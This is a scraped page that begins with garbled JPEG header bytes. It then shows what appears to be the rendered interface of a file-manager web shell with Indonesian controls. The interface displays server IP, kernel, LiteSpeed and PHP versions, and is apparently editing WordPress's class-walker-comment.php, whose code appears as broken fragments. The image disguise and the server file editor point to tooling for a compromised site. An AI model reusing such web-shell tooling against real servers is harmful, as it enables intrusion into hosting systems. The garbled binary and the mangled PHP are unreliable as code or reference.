JFIF H H C
%# , #&')*)-0-(0%()(
P P 5 !1AQq "#2Bar R Sc ? R X o k , e k X 9["&Q
}Nq' {u\ 6hc i r _ n[t lU ;8 Ax r { f Q 岳 /f 8 T D'e W^ YŞ }h 7 ` Կ ֑ w.gVtq> 5 O y .>%X U]3 \ ${ أh ~k Բ o Fq # y 0 & ; -W * %K m'o Yt L Q TS1 % `y= + b dmi HC T_# | P 㬈v;?E U "
W< ms MmL G1 9 ' ' % akJo]Qcr խ O$
;:V > _Dn s m۸U # ҝ ܾpe.qw3 / * a# =\.!N s l x Ԗjz Z ! >! Ɵs E< 9 N9m / E & y ? yY$a p - R 5 6 XOk$>D 켎 T RUT < > h < 9 D } ?f8 $
EYki/O 28 }# "( 9 <
x G Ԑ YD 2 DL
Default page
Your IP: 216.73.216.213
Server IP: 66.29.146.36
Server: Linux premium227.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software: LiteSpeed
PHP Version: 7.4.33
Buat File |
Buat Folder
Edit File: class-walker-comment.php
\n";
} else {
$output .= "\n";
}
}
/**
* Outputs a pingback comment.
*
* @since 3.6.0
*
* @see wp_list_comments()
*
* @param WP_Comment $comment The comment object.
* @param int $depth Depth of the current comment.
* @param array $args An array of arguments.
*/
protected function ping( $comment, $depth, $args ) {
$tag = ( 'div' == $args['style'] ) ? 'div' : 'li';
?>
< id="comment-" >
', '' ); ?>
comment_approved && ! $show_pending_links ) {
$comment_text = wp_kses( $comment_text, array() );
}
return $comment_text;
}
/**
* Outputs a single comment.
*
* @since 3.6.0
*
* @see wp_list_comments()
*
* @param WP_Comment $comment Comment to display.
* @param int $depth Depth of the current comment.
* @param array $args An array of arguments.
*/
protected function comment( $comment, $depth, $args ) {
if ( 'div' == $args['style'] ) {
$tag = 'div';
$add_below = 'comment';
} else {
$tag = 'li';
$add_below = 'div-comment';
}
$commenter = wp_get_current_commenter();
$show_pending_links = isset( $commenter['comment_author'] ) && $commenter['comment_author'];
if ( $commenter['comment_author_email'] ) {
$moderation_note = __( 'Your comment is awaiting moderation.' );
} else {
$moderation_note = __( 'Your comment is awaiting moderation. This is a preview, your comment will be visible after it has been approved.' );
}
?>
< has_children ? 'parent' : '', $comment ); ?> id="comment-">
< id="comment-" has_children ? 'parent' : '', $comment ); ?>>
comment_approved || $show_pending_links ) {
comment_reply_link(
array_merge(
$args,
array(
'add_below' => 'div-comment',
'depth' => $depth,
'max_depth' => $args['max_depth'],
'before' => '',
'after' => '
',
)
)
);
}
?>
Simpan